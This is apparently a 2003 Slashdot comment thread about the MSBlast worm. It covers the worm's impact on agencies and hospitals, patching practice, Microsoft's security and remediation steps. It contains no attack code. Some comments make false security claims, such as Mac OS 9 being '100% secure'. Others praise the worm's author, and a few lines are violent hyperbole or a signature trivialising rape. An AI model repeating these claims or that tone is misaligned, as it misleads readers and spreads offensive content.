App accounts should NOT be system accounts. If I want to have the same user and pass for HTACCESS, FTP, SMTP, POP3, and VNC, I'll set up the separate programs handling them to have the same user and pass in their respective account files. I don't want the OS to handle all the passwords. When you do that, then getting a password means you have access at some level to the OS which leads to escalation hacks. The intelligent way where say an FTP account has nothing to do with a system account, getting a username/pass only gets you into the FTP account.
If you get a password for my mail server, worst case you can read my e-mail. If you get a password for FTP, worst case you can change some files.
Ben
Work Safe Porn
Microsoft is already on it. The whole .NET initiative. You didn't think they were going to keep on keeping on with the old ways, did you? Subscription software all the way. They'll make more money that way, and with them in control of your system, the problems seen here will go away, i.e. every one of the problem machines out there right now would already have been patched automatically.
This whole crisis is an opportunity for Microsoft to hype what they've been hyping recently (subscription software, downloaded from MS regularly).
A Good Intro to NetBS
Yep. They're stupid idiot users.
Keep insulting them. They'll grow to love Linux with advocates like you harping at them.
I thought Apple had a new enterprise software rollout....
That's the sort of situation I was talking about. Or situations where company x was paralyzed because company y's network was down, but (after I actually think about it for a second) it seems to me that almost any case like that would be covered by some sort of contract, whether y was an ISP or a datacentre or whatever. However, it still seems to me that there's a certain sense in which the Internet is a commons, and we may end up with the government regulating networked computers as such. Depending on the scale of the infection, the DOS on the 16th could make the whole bloody net crawl, if too much bandwidth is consumed. Enough occasions like that might motivate the government to impose more standards on system maintenance.
Uhhh.. no. This is a side effect of a homogenized world. It's no different than growing a forest of cloned trees, or a race of cloned people. Because they are all identical, they all suffer the same weaknesses. As a result an infestation that would ordinarily kill hundreds instead ends up killing off the whole forest - or an entire race.
If everyone had macs (or linux) virus writers would be targeting macs or linux. The problem isn't just windows: it's that a single OS - a single "species" - is far too pervasive.
"I'm unaware of the [Microsoft] patch being available," said David Hugel, the deputy chief administrator of the MVA. "I've talked to our IT people and we weekly update the virus protection we do have, and this just happened to fall between those points when we had updated it and we didn't have the [new] update available yet."
How about downloading security patches, too?
I suppose Skynet 1.0 is released soon.
Inevitably, some report will appear in the papers saying the MSBlast worm caused $ X million worth of damage, but really we've been lucky so far with Melissa, Code Red, Simba etc. None of them have had any serious payload. I think people forget the real harm that the virus author could have caused if he/she so wished (corrupting your data files, or formatting your hard disk, for example).
" How do you know this person was trying to get people to switch to Linux (or anything non-MS)? S/he could just be an ordinary asshole, without a point to prove."
Actually they want everyone to switch to Microsoft's Millennium Edition (ME) version of their operating system. This worm has NO effect on ME.
This virus also appears to cause the system to open the "My Documents" folder whenever a user logs on to the system, it opens that user's my documents folder (at least, that is what it seems like all three of the infected machines display this behavior)
most daemons/services are capable of authenticating users via PAM or from an SQL database.
for apache, PAM auth, mysql auth and postgresql auth.
for ftp you could use proftpd and ignore system accounts completely, it supports quite a few alternative methods.
for the email solution use something like vpopmail with no system users and supported by quite a few MTA/POP3 agents.
If you don't want the OS to handle the passwords, then you can set it up so it doesn't. By default system accounts are normally used which I assume is from the era of people having shells and doing * from it, ftp/read mails/etc in which case things would use the standard system accounts..
YOU ARE WRONG : Mac OS is 100% secure according to WWW consortium and SecurityFocus's extensive database of exploits.
Webservers running mac OS 7 through 9.2.2 (the latest) have never once been exploited in the history of the internet.
This includes load distributed webservers on MacOS run by army.mil and many large universities.
no mac has ever once been exploited because of technical achievements in the mac OS.
I am not talking about unix based "OS X" which has already had over 30 known security holes, I am talking about the 100% secure mac OS 9.
Therefore you are wrong.
Consult BugTraq if you doubt me.
Read and learn.
there are 100% secure OSes...
Happy patching.
Code is Speech. No to Censorship.
there is no "code" just a bunch of n00bs looking at packet captures while other people interject "what's a packet" and "if i knew about computers i would help", hell they even recommend Steve Gibson's site (grc.com) to check if they are infected and as anyone with a clue knows he's not worth listening to
of course if anyone has a complete disassembly then post away, but at the moment there is nothing of value in any of dslreports threads
Not all hospitals do.
;)
I work for one of the largest health care systems in the US, and we didn't even hardly get touched by this new virus. We did have I think one office (NOT in a hospital, one of the 'corporate' ones) get hit by this, but it only affected a handful of users.
Then again, we are tortured by VMS and some Sun Mail programs...
I couldn't disagree more. While this virus writer did do something bad, it has good side effects.
Think about those government records, think about your info in those records.
Think about a cracker, think about him staring in disbelief why his nmap scanner is picking up port 135 open on each computer. And all those computers are unpatched.
Think about that cracker executing arbitrary code on those servers, undetected, unknown. Think about him downloading and installing a root kit and covering up his tracks. Think about this cracker working for a terrorist group.
Think about them having unfettered access to machines that have criminal databases and are used to authenticate and create new ID's.
This virus maker did us a favor. I'd rather have a government machine go down for a couple hours rather than have it under the control of a malicious hacker. At least this way they will get it patched.
Hey Guys and Gals,
:( Cut it out guys, every patch is another nail in the coffin (big picture here *nix guys don't go nuts).
No matter how we look at this - I personally find the fact that people continue to exploit disturbing. I mean seriously, why can't we save these things - for instance when MS does a major OS rollout in public?
Ok, I'm not being very clear - my concern is *Nix got so good because of years upon years of hacking, cracking, and fine tuning. As of right now MS isn't paying anyone to find holes (well presumably), they are getting some pretty bright folks finding very good holes - they are PATCHING THEM. What does that mean? Pretty simple if you ask me, with each exploit and patch - MS is on its way to making a better, and better, oops another patch, and better OS. People aren't migrating like we thought they would - even with the hassle. So keep exploiting you morons - let's bring MS to its knees!!!! Yeah right - keep dreaming, keep finding the holes so MS coders can do their typical HALF *ssed job all the while allowing us to fine tune their OS.
It's not a new problem. Nor is any amount of wishful thinking going to fix the problem, Microsoft's products just aren't engineered for security. It's a problem that would take years to fix. Bill Gates himself made allusions to the U.S. Apollo space program of the 1960's which was $25 billion over 10 years. However, for the time being, the security issue is treated like a PR problem and the customers are taking the lumps.
At this point the problem is sociological or psychological. Like any other cult, Microsoft provides a sense of purpose and belonging to its supporters. Note that neither a technical background nor even an analytical way of thinking is a prerequisite, thus fulfilling even the unconditional acceptance aspect of a cult.
As much as IT staff and, especially IT managers, admire the personal wealth of Bill Gates, they just need to be able to let go of Windows and move on.
Move on, either to Macintosh or Linux or QNX or BSD or Novell, there are many choices. There will be some up front costs, but even without the viruses and worms these upfront costs will be offset by the number of maintenance hours saved.
Beta is broken and the link to classic doesn't work. Stop wasting our time or there won't be anybody left here.
Let's try to imagine if it carried a Chernobyl-like payload, or the feared root name server DDoS. Man, that's scary. So, the first one with an exploit ruins it for the rest, as at least some of the world finally realizes that it needs to patch, rendering the real killer-virus less effective, should it ever see the light of day.
I guess in that context, we should be grateful. It's kinda like if you're walking down the street in a bad neighborhood. Wouldn't you rather have some a**hole just slap you in the face, rather than said person walking up and shooting you?
Actually, several anti-virus companies named this worm W32/Blaster. There ought to be some kind of campaign to make sure people call it W32/Blaster, and not just Blaster. Where's RMS when you need him?
I do not know the intentions of the creator of this virus/worm, but it could have been a lot more malicious. It will hopefully be a wake up call to people to secure their systems, before something really bad is unleashed.
you should probably think about spending a few billion on making products that don't cost your customers insane amounts of money and lost productivity due to down time because of pathetic security and coding practices.
Yeah right, how are you going to get them to buy Windows ZP 2005 then?
Just because you're paranoid doesn't mean there isn't an invisible demon about to eat your face
This virus patched billions of systems in a quick amount of time. With these systems unpatched... Much worse things could have happened. The virus maker did Microsoft a favor by releasing this. He made it annoying as possible without doing any serious damage. Making it annoying made you do something to fix it.
And if you didn't patch, well it's your fault. You were bound to get your system ripped open sooner or later anyway. So now your system is fixed.. You are less likely to receive a virus that will destroy your system.
Especially since writing a Windows virus is easier than trying to get the dependencies straight for all of the packages I want installed.
Microsoft did make the patch available well before the worm was unleashed. If people would regularly check "Windows Update" (http://windowsupdate.microsoft.com), or enable Microsoft's Update download capability, this would NOT be an issue!
For anyone who thinks that viruses are developed by those selling anti-virus products, consider this quote from Al Huger, senior director of engineering at Symantec: "The worm was intended to co-opt your computer for its plan, but it is badly written," said Al Huger, senior director of engineering at Symantec Corp.'s Calgary security response unit. "If the writer of this worm had got it right, it would have been unlikely that most people could have accessed their computers this morning." It sounds to me like he's pissed off that one of his employees didn't do a better job.
Obviously there were thousands upon thousands of computers still vulnerable to this exploit when this worm was released. I honestly think that this particular worm has done the world a favor - a security hole this critical was BOUND to be exploited sooner or later. Better that this relatively harmless "vaccine" force everyone to patch their systems now. That way, when REAL malicious exploits hit - that actually delete files and destroy your work - most systems will no longer be vulnerable.
Heck, I'd almost wager that Microsoft released the bugger themselves in order to reduce the impact of the next big one...
I have a friend at the GSA, and I told him this was going to be coming last Thurs. He told his bosses, they told him, "We could get most of them upgraded, but it would be a lot of work. F*ck it" Needless to say most of their office went down, as did many of the gov't key GSA databases. It's not really funny, but....Ha Ha.
...if they used linux in the first place, why the hell do they care about M$? To me this stinks of disgruntled windows user.
This virus talk is rubbish. I'm typing this on a Windows computer right now and everything is working fi
Various Arkansas Government agencies are afflicted, too.
What those who want activist courts fear is rule by the people.
And people pay for it tooo!!! what a racket!
and how many switched after Code Red? ILoveYou? the countless others? Those who got infected either had someone take care of it or just reinstalled the system. This is what they are trained to do and expect it with computers.
I agree with your premise and disagree with your conclusion.
Microsoft has trained people to think that "computers are unstable" and "computers need to be rebooted frequently to fix problems". This is what they are trained to do and expect it with computers.
Viruses are different. People can understand needing to "turn it off and turn it on again" to fix a problem. Viruses are scary. Viruses will "erase your hard drive"! People have been hearing for the past two days that viruses affect "any computer running Microsoft", and people are also aware that there are alternatives to Microsoft.
I think repeated virus attacks will drive people away from Microsoft in greater numbers than Microsoft-imposed instability ever did.
I don't make the rules. I just make fun of them.
but to be slow at patching servers and systems is just plain stupid. Any system not patched up when you had a month to get the patch deserves to be hit hard. Lazy sysadmins need their asses handed to them, it will weed out the weak and we intelligent people will get the better pay. It's good for all of us in the long run.
W32/Blaster delivers its payload against windows update -- on the 16th. Debian turns 10 -- on the 16th. Coincidence? I think not!
Three weeks ago we released information to all employees about this exploit and demanded that they patch their systems immediately. We made it convenient, simple, and mandatory. For the most part people patched, but those 300 or 400 people that were either too busy, too lazy, or just plain stupid cost us a lot of money and downtime. We've mopped up the last of the outbreak, but the damage to our business and our image is going to take a long time to heal.
Yes Microsoft Products are flawed, and vulnerable, but whining about it isn't going to change a thing. All you can do is plan for the worst and do your best to keep your company alive; after all they are the ones who cut the checks which allow you to pay for the right to flame all you want on Slashdot.
My $.02
This would be a lot nastier than a harddrive wipe.
With the wipe, you know it's all gone...just reload the backups.
With screwing the data...what's right? what's not?
That could truly be a costly virus...costly in many ways.
Sean D.
"Hmm. I am to metaphor cheese as metaphor cheese is to transitive verb crackers!"
Yes they have 50 Billion dollars, and guess what they want more. They don't care about the value they put in their products. They make a shitty product, then surround it with a EULA saying if it breaks it's your fault and we can search your computer, if you leave this this and that on. Though you can blame them on this since they did release a patch a month ago, however I guess you could still blame them because the vulnerability is in NT4 (which again since we're lazy assholes, we won't fix NT4 just like the last time) which is how old? It had 6 service packs, and yet they couldn't fix the problem within one of those. I've talked to be about how Microsoft is a monopoly and why Windows is bad, and they all come back saying, well Microsoft is a good company, nobody is forced to buy Windows, they're a monopoly because they had good business practices. If people actually understood what Microsoft does illegally, and why Windows is terribly insecure (hey if you want you can use that as FUD, terrorists can break into Windows easily, then again it's not far from the truth) I'm sure there could be a massive pull out, in the long term.
But then the issue is one of resources, pure and simple. So when government agencies and public institutions (like my buddy's university) have their networks go down, this is a direct result of underfunding. And underfunding is your tax cuts at work (your jurisdictional mileage may vary).
First, you are shooting yourself in the foot every time you make an argument and label it "simple". If the issue were really so simple, then its simplicity would be self-evident and you wouldn't need to label it as such. The very fact that you feel compelled to tell someone that it's "simple" generally means that it is anything but. (The same thing goes for arguments labeled "clear" or "obvious".)
Second, a government organization which lacks resources may lack resources due to poor budgeting (i.e., money going towards pork rather than to that which makes government function). Government at all levels spends money on pork. After tax cuts, governments could have reworked their budgets (you know, like us regular folk who don't have the power to plunder at whim have to do) and cut out pork, redundancy, overspending, etc. But, then again, what about all those precious votes? I'm sure there's plenty of politicians who are completely willing to let their server farms crash if that means saving their favorite vote-buying programs.
I don't make the rules. I just make fun of them.
In addition to the Maryland MVA, all the computers at the Montgomery County (just outside Washington DC) library system were hosed. When I went last night, they had the checkout system back up (the Post said that they had to do manual checkouts earlier in the day), but all of the public access computers were down with handwritten signs saying "Down due to virus attack".
This page accidentally left blank
I know /. is the place to bash the microsofties, but don't let it get to your head. Remember, anything with the name Microsoft gets instant press, outside the techies the public thinks "apache" is the old movie name for a First Nations tribe.
I regularly do security audits of all kinds of systems. When I walk in to a microsoft shop I can immediately tell how it goes. If the sysop says "I don't trust the patches, I test them, but they're not deployed unless there's a REAL problem" It won't go well, those guys usually don't update virus files either. On the other hand if the sysop is using patch management practices he can often go out in real time and check the current status of a server, workstation, and active version of the virus definition file in realtime (they usually have good WRITTEN policies on unauthorized (untested) soft/hardware with sanctioned backup). I haven't found malware in any of the latter cases.
I've yet to find a good *.nix shop. They often have good processes and procedures that SHOULD avoid problems, but the truth is it's easier to sign a piece of paper that says sourcecode was patched and applied than to actually do it. Things look great on paper. Check the source or decompile sendmail (one of my favorite targets) and it's another story. I'm still finding the same hole T.Morris used years ago on active servers. The excuse is always the same, "that was the way it came, shouldn't that have been fixed in the distro by now?" (i.e. too lazy to look, just signed the paper). Many don't even check SANS or CERT regularly. At least windows will notify you when critical updates are available, and all you have to do to apply it is run the .exe. Even then you get guys like this story highlights:
"I'm unaware of the [Microsoft] patch being available," said David Hugel, the deputy chief administrator of the MVA. "I've talked to our IT people and we weekly update the virus protection we do have, and this just happened to fall between those points when we had updated it and we didn't have the [new] update available yet."
(How did this guy get his position or experience? Even "end-users" successfully use critical update with relatively NO technical experience or fiscal responsibility.)
Any sysadmin that can't keep a system patched, or falsifies patch records should be punished up to and including dismissal as far as I'm concerned.
Incidentally, just so you know my audit document is the CERT advisories on securing systems. If you want a great basic book try O'Reilly's "Practical Unix and Internet Security"
Has anyone figured out yet that as far as I'm concerned the problem is NOT theoretical design differences in OSs as much as the incompetence of the people running them?
It doesn't matter what you wrap your emotions around, Reality is a brick wall specifically designed to scramble eggs
I was not trying to be anti-MS and I believe my statement about using a non MS email client and browser will definitely reduce your risk of viruses and not only because they are not as homogeneous as you claim but because they are NOT integrated into the OS and NOT tied to multiple core functions of the OS that allow these worms to work as efficiently as they do. That is a fundamental issue that will always make any closely tied system at risk. The use of raw data and application code and executing them from an application that is tied directly to the core of the OS will ALWAYS be harder to maintain security than a system that does not have this integration. That is a fact no matter which way you look at it. People are always told to not run an unknown executable file. Well any time you deal with documents, emails, web pages, help files from any JoeBlow on the internet on a MS Windows system, you are dealing with files that can and will execute code. Couple that with a known weakness elsewhere in the system and you have a new worm and or a virus. This is the basis for almost every major worm and email virus for the past 5 years.
Bad boys rape our young girls but Violet gives willingly.
"...plant designers and control software writers tend to stick with well documented commodity hardware (Win32)."
Win32 well documented? You are kidding, aren't you!!!? Well documented software is where you have the source code or at least when you are dealing with a highly ethical software developer!
And if you are a serious businessman, everything you do should be critical and expensive! Otherwise, you are just wasting time and money.
I think the best side-effect of this virus/worm is the CNN poll it spawned, which revealed that more than 40% of those polled are completely clueless.
Everyone is commenting that the sys-admins should have updated their systems. The company I work for got railed by the worm, all of our PCs, and all of our servers. Why weren't they patched? Because corporate policy says that we aren't to install service packs, security patches, you name it. We were certainly aware of the security bulletins, we just couldn't do anything about it. Might be about time to start freshening up my resume.
...something like 97% of the world's worm/virus designers spend 100% of their time on trying to torpedo Windows. I wonder what the people using Linux or any other Unix/Unix clone would do if they got that sort of non stop attention. Please note also that it is perfectly possible to harden Windows to the point that it will withstand all but the most determined of attacks. I know because I am responsible for a pool of Windows servers who never noticed this virus exists because I patch regularly, installed anti-virus and software, a firewall and took a number of elementary precautions way before this thing ever hit the net.
"....if you dont know something is dangerous it is your own damn stupid fault!!! Not the programmers's wrote your Open Source webserver so that it can be run as root on port 80!".
Only to idiots, are orders laws.
-- Henning von Tresckow
So the Washington Post article requires you to fill out their silly little survey before you read the article. The lower limit of the birth year field is 1900. Isn't it possible that someone older than 103 could conceivably be online and looking at this article?
Dunno, I just found it interesting.
Why no Bill ~300 million windows machines are not spamming your website. How could they? They are not susceptible to computer viruses...it must be sumthing else...
entropy
"I know people are worried because we have a lot of personal information here. This all stored in what we call a 'Data Vault', and I want everyone to know that information was never in danger because it is not stored on a Microsoft system."
-- ac at work
Ok folks. Sorry fer jumpin on a thread.
:)
Guru help needed now.
Our home network has my box (knoppix) talking to net via parents win2000 box. Got call at uni. Computer haywire. Got home , sure enuff, theres msblaster doing its fandango.
So I get the cleaner clean it up, go to download the patch from ms site to avoid clean up and...... "Where the fsck is service pack 2?".
WTF?????
Anyway, the moral of the story is that service pack 2 is a humongous download thru a 56k modem, and the only way to block this bitch is via zonealarm..... *EXCEPT* that zonealarm free version kills NAT from the windows box.
Windows being as it is , lacks iptables, or any nifty stuff like that, so I'm confounded.
*IS* there a firewall , that like free and all, that doesnt waste ICS?????
Cos as it stands , this whole business of not being able to do assignments and stuff is REALLY getting me down.
Thankyou for listening. Hope you can help
Excuse the Unicode crap in my posts. That's an apostrophe, and slashdot is busted.
The grandparent post provided a good argument. The parent post, however, simply responded with an immature red herring, in the form of a spelling-nazi attack. Since he was logged in at the time, he should be penalized.
Kill the paper MCSEs. Shoot them in their heads.
the only thing this WORM maker did was wake everybody up to install this one patch. people aren't gonna catch on that this is not a one-time occurrence. it's gonna happen again and again. The guy that originally found the vulnerability reported it to microsoft a long time ago. then microsoft posted a patch a long time ago. all this virus writer did was prey on the fact that people don't update their machines like they should. i believe windows xp has automatic updates on by default and you have to turn it off explicitly. Why are all these end users turning off the auto update features. these are the same end users most slashbots say are incapable of understanding when the taskbar has been moved from the bottom of the screen to the side. Anyway I am rambling. What I am trying to say is sure, Microsoft's security is a bit lacking, but they patched the hole long before this exploit came out. The users are dumb for turning off auto-update. and the virus-writer is an asshole for vandalizing computers under the guise of "sending a message". Microsoft already had the message and already fixed this exact problem before the worm was ever released. I am not an MS fan, I use a mac myself, but jeez. they were on the ball this time. there are many programs released in the *nix world with security holes that were not foreseen before too. these things happen, get over it. clearly the guilty party is the virus writer. If there was a problem with the locks on the doors of your car would you prefer someone to knock on your door and let you know that your lock can easily be circumvented, or would you want that same person to enter your house using that vulnerability in your door, invite some of his lockpicking friends over and then use your house as a homebase to do the same thing to other houses, so they can then use those houses for the same purpose as they used yours, and so on?
Why is this criminal in the real world, but doing us a favor in the world of computers and i see since you mention terrorism that you have been sufficiently programmed by the mainstream media so I don't even imagine you have read this far.
Thanks for the eloquent post. You should have been modded at +5 under-rated as well. That's a point that I tried to make previously but I usually get modded down as a troll.
Why is it Microsoft's fault when THE PATCH WAS RELEASED A MONTH AGO? A simple ~800kb patch. The exploit even made a Slashdot headline, so it was well-reported.
The fault lies in those people who don't patch the operating system with the critical updates put out by its maker.
"Sufferin' succotash."
Microsoft recently released the Software Update Service for Windows 2000. You don't need AD to use it. You set a server on your network to grab the updates from M$ and it then updates your internal systems. It's a bare bones implementation, but at least you don't need to rely on users to patch systems. As you have seen, 100% compliance is impossible, and all you need is one hole... I am a SysAdmin in an all Windows shop; I keep my servers patched and my virus scanners up to date, and I haven't had a problem in the two years I have been in this position. It can be done.
"What the American public doesn't know is what makes them the American public." -Ray Zalinsky (Tommy Boy)
The patch was released a month ago. "This type of crap" wouldn't have happened if systems were patched. My network was 100% unscathed. There's a reason Microsoft puts out patches listed as "Critical Updates," y'know...
Here's the part where the Microsoft conspiracist or the EULA-hater chimes in.
"Sufferin' succotash."
... above the fold, top-right corner in the dead tree edition this morning, with a continuation on page 14 or so, and two articles on the facing page (one about the MVA getting hammered, one with detailed instructions on how to clean up your infected machine).
The headline was Internet Worm Targets Microsoft Windows. We'll know they really get it when the next headline is Yet Another Microsoft Worm Breaks Windows.
To a Lisp hacker, XML is S-expressions in drag.
I've seen a couple of XP machines that the OEM pre-install defaults to having updates switched off -- I guess the OEMs just don't want the hassle of users phoning them up asking whether or not to install the patch, or dealing with problems from broken patches. I wonder how many calls they're getting at the moment...
I ran Windows Update Tuesday morning. Tuesday afternoon, I got a copy of MSBlast.exe on my machine. Don't trust Windows Update to work correctly.
Question: Does Windows Update/Auto Update apply the DCom patch, or does it have to be applied separately? thanks.
...problem solved. (-:
If you want to see your MS-Windows alive again, fill a suitcase with unmarked non-sequential medium-sized Bills... er, I mean, use Knoppix to download the patch(es), then reboot and apply them to 'doze toot-sweet before she reboots. Having a DOS window handy to type "shutdown /a" into is good medicine as well.
Got time? Spend some of it coding or testing
...just like they do for cars and such?
Got time? Spend some of it coding or testing
The FDA treats Blood Bank software in particular as if it were a "medical device" and requires much of the same kind of validation as any piece of medical hardware. I can't make a change in our blood bank software without filing FDA documentation.
The FDA is currently looking into requiring such documentation for Pharmacy software (at my work blood bank and pharmacy are known collectively as "the two places where a software bug can kill someone").
"Can't you see that everyone is buying station wagons?"
...if you're agoraphobic. (-:
Got time? Spend some of it coding or testing
Meanwhile, our couple hundred Linux servers keep chugging along unaffected.
Installing the free update has often been asking for trouble. Microsoft have an unenviable reputation for breaking things with their patches. This is kind of inevitable when they have such poor understanding of exactly what's going on inside their own (possession really is 9/10ths of the law) OS.
Just install Service Pack MAXINT. Problem solved. Hint: it has a penguin on it.
Got time? Spend some of it coding or testing
FTP is not "tied" into the OS. In fact, none of these services are tied into the OS. I run many servers and Full set of services: http, ftp, pop3, imap, ssh, smtp.... and none of them use a /etc/passwd file. In fact, they all come out of an LDAP store.
...so would you care to restate that "I'd trust the computers in a car before I trust" part? (-:
Got time? Spend some of it coding or testing
Being a long time resident of Philly, this doesn't surprise me at all. I've dealt with and know a few of the drones employed by the City. They'll maybe have it all fixed by Spring '04.
Heck, just last month, we almost killed a Supreme Court Justice during the dedication of the National Constitution Center:
http://www.nbc10.com/4july/2312737/detail.html
I just love this town (sneer)!
Political correctness is the newest form of slavery.
Just an example, the Windows update for L2TP/IPSec that interfered with customer's ability to connect to the internet. Thankfully, Microsoft removed the update and posted an updated version of the update but it goes to show that if system administrators installed every update just because Microsoft said so, there would be plenty more problems created than solved.
Prozac makes the voices in my head say nice things to me.
Read it and weep.
Got time? Spend some of it coding or testing
...load it from paper tape before you could start using it.
Got time? Spend some of it coding or testing
Yet another clueless person who doesn't realise that WinXP doesn't come with many applications, therefore decreasing the risk of bugs in code.
There's a reason I wrote "and many aren't in software that even has an equivalent included with Windows", you know. Try reading to the end of the post next time.
Why are all these end users turning off the auto update features.
Because they got burned once when Windows Update started sucking a several Gigabyte service pack over their modem connection?
Or maybe they got tired of having to wait through the several download a patch that has to be applied separately and reboot cycles when all they wanted to do was check the movie schedule for the local theater?
Or maybe a social engineered malware webpage changed the settings by telling them click the link and it will double their internet connection speed?
Or maybe they are so burned out with having to patch their system three times a week they just don't want the bother since after all it is someone else that is going to get the virus not them?
ad infinitum, ad nauseam
not to be an ass or anything, but it's a worm, not a virus ;)
I'd only trust my life to a machine that runs a completely custom OS built for one purpose that does one thing, and does it well
Yeah, and that's why I would only ever trust my life to an iPod.
At least make it painless.
Got time? Spend some of it coding or testing
If a system outside the modem/router can't access port 135 on the machine in question, you are REASONABLY safe for a few minutes until you have time to install the update.
If a system outside the router can't access port 135, why is it safe for only "a few minutes"?
I don't know if grc.com is the end-all of network security, but according to their port probe, my port 135 was "stealthed" just from the router NAT, even without ZoneAlarm running...
So how am I going to get this worm?
Why not create secure software.
... whoops ... I mean created WinNT they had a secure OS. Then they went and F**KED it!
When MS stole OS/2 3.0
Their bottom line is profits. A product purposely broken is always upgraded. Not surprisingly the upgrades are never free. Not to mention the exploit was there way back in Win2000 !!!
These articles suggest that MS knew about this fault for a month and that "experienced" sys admins were patching their systems.
I did a fresh install of w2k last Friday and I installed every patch that was available. A patch for this worm was NOT on their site.
Using a different mail program doesn't help because many of these viruses carry a packaged version of Outlook Express mailer. I had a machine infected with one of these (different virus, at the time an unknown variant of an existing virus) - I identified it because it was sending mail using OE 5 and messages bounced back, but I was using Outlook as my mailer and had OE 6 installed with a Windows Service Pack for Win 2k (not 5).
:)
The only real solution is to throw out Windows... now if I can just convince management
cost your customers insane amounts of money and lost productivity
But isn't that exactly why people upgrade their MS OS? At a ridiculous price I might add.
Of course you can prevent this bug from affecting your computer by using the built-in Windows program "dcomcnfg". You can use that program by disabling DCOM.
:)
Fortunately for me, I disabled this "feature" long before the worm started spreading. Some COM books mention this tool, and since I didn't think DCOM was useful for my computer, I disabled it
For the love of man and everything holy, USE A DAMN HREF and stop putting a space in root!
click
Slashdot still doesn't support Unicode after it was added to the HTML standard in 1997.
The now defunct @HOME had quite a few similar incidents with Sun boxes. The computers were stable and secure, but they had power cords!
Took a human with access to do damage after running fine for years. Not some pathetic virus.
Just a thought... But do they really use consumer grade computers? Maybe as terminals but last time I was in a hospital's computer room there were no windows boxes around. There was a Dec cluster, a solaris box maintaining a huge optical library, and a bunch of shit off the set of "2001 a Space Odyssey".
Here's a rundown of what I've found out dealing with the MSBlast worm, some of which wasn't posted to the list yet (or I just missed it). Luckily my systems here were patched before this came out, but a few people brought in laptops that weren't patched, so here's what to expect.
MSBlast Symptoms:
Windows XP: Computer displays a message that the computer will shut down in 60 seconds.
(Go to a command prompt and type "shutdown /a" to abort the shutdown.)
This indicates that your computer is infected with the MSBlast worm.
Windows 2000: Computer displays an error message about "svchost.exe" fatal errors. Odd behavior follows, such as not being able to drag-and-drop certain items, Internet Explorer context menus (right click menus) don't work properly, and other bizarre behavior.
This _does_not_ necessarily mean that a computer has the worm, but the svchost.exe could be crashing as a result of the worm trying to get in. However, you should still run the removal tool to make sure.
Some people have associated this with the install of Service Pack 4, but it appears to be coincidental and not related to the SP4 install. However, SP4 does seem to have its own user-reported set of issues unrelated to this worm, as discussed here:
http://www.w2knews.com/anecdotes.htm
Windows ME/98/95: Unaffected by this worm.
Windows Update: Windows Update is running incredibly slowly.
You may or may not be able to get in to update your system. This is due to the fact that millions of people are all hitting the service at once trying to get the patch to stop this worm. If you keep trying, you will eventually get in, but it may take a number of tries and 5 minutes or so per try. Additionally, you may get an HTTP 1.1 Server Too Busy error message even after you are in. Just keep clicking on the "Review and Install Updates" link on the left side pane and it will eventually let you in. When it does make a connection, the window or system may appear to hang for up to a minute or two. Just wait it out and it will eventually wake back up with the Blindly-Accept-Our-New-License-Terms window. Read the license terms thoroughly and print out a copy for your files (sorry, couldn't resist) and then click "OK" and the updates will then download (slowly) the needed files and install them.
To make matters worse, the worm will start a Denial of Service attack against the Windows Update site on Saturday Aug 16, so if you think it's bad now, you ain't seen nothing yet.
Worm Trivia: The worm contains the following text, which is not displayed on the screen:
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making money and fix your software!!
If you experience either of the above symptoms on your PC's, you need to apply the appropriate patch from here immediately:
Windows XP Security Patch:
http://download.microsoft.com/download/9/8/b/98bcfad8-afbc-458f-aaee-b7a52a983f01/WindowsXP-KB823980-x86-ENU.exe
Windows 2000 Security Patch:
http://download.microsoft.com/download/0/1/f/01fdd40f-efc5-433d-8ad2-b4b9d42049d5/Windows2000-KB823980-x86-ENU.exe
Windows NT 4.0 Security Patch:
http://download.microsoft.com/download/6/5/1/651c3333-4892-431f-ae93-bf8718d29e1a/Q823980i.EXE
Windows NT 4.0 Terminal Server Edition Security Patch:
http://download.microsoft.com/download/4/6/c/46c9c414-19ea-4268-a430-53722188d489/Q823980i.EXE
Windows Server 2003 Security Patch:
http://download.microsoft.com/download/8/f/2/8f21131d-9df3-4530-802a-2780629390b9/WindowsServer2003-KB823980-x86-ENU.exe
Then, run this program to scan your system for any remaining parts of the worm.
Removal Tool:
http://securityresponse.symantec.com/avcenter/Fix
Some day, you will learn that you cannot succeed with Windows. Until then, may God have mercy on your soul.
The MVA (Motor Vehicle Administration) was out the other day. So now, I not only have to wait for hours and hours, I turn in the forms and they tell me to come back the next day to actually pick up the license.
I feel so alive...
"Thirdly, you've just annoyed people who have access to these different systems as they now have to change their password in 3 (or more?) different places."
Exactly. Admins who are lazy will sacrifice security for simplicity.
If you've got the same userpass for everything someone only needs to figure out one userpass to get in everywhere.
If you force your users to have different logins for every app and keep all your app accounts separate from the OS then if someone gets one userpass the amount of damage they can do is minimized. If someone gets my SMTP password, worst they can do is check my e-mail.
In your setup if someone gets your SMTP password they can check your e-mail, mess with files and even possibly escalate permissions on the OS and do some real damage.
Ben
Work Safe Porn
We're not speculating here. This has been done before. Years ago, there was a MS-DOS virus which messed with dBase database files, which were common at the time. IIRC it changed some random bytes in the file.
Now the evil part was that the virus hid these modifications from the rest of the system. The users didn't notice. Only when they erased the virus (or moved the database to another, clean computer), they found out that their data was corrupted.
Luckily, this virus didn't spread far AFAIK. But a good infection routine and the payload can be combined...
I heard recently from a 17-year-old friend of mine here in Slidell, LA (outside New Orleans) that the local DMV was "taken out" by the recent Msblaster worm. It took a few hours for him to get his new driver's license.
--Bahamlabs
After reading some of the messages, a question came to me. If we were living in a world where the majority of computers were running upon MacOS, isn't it predictable that the majority of viruses would spread on this kind of environment instead of Windows? My question is how much we can attack the lack of effort from Microsoft to increase security, and which part of the burden we should blame on a natural exposure of the most used platform to this kind of motivation?
Myself and other admins have seen patched systems get infected anyway. The patches MS put out for this didn't work.
There are newer patches now, perhaps they will work.
A former dot-bomb refugee from an all-Linux/Unix shop, I've now the (mis)fortune to have worked the last few years as an interface programmer at a 150-bed community hospital. Unfortunately the (mis)managers have seen fit to stock their computer room over the years with now around 60 servers running some form of Windows, and all on a LAN with Internet access. Yesterday the hospital's critical pharmacy and electronic medical records systems were disabled for several hours due to the recent exploit to Windows systems.
You know? I've wondered why Firewalls weren't built into the NIC. A Firewall really isn't a complicated beast, and hardware is cheap.
MS has made it so that IE is REQUIRED to access the Windows Update site. So, if you've managed to remove IE from your computer, you cannot update your PC to shield against Blaster and your PC will attack MS's site on the 16th. Except for some Internet lag though, it's not your fault because MS decided not to make the patch available to people that exclusively use other browsers. So... Those of us that don't use IE have been invited to attack MS's site by MS!!! How cool is that!
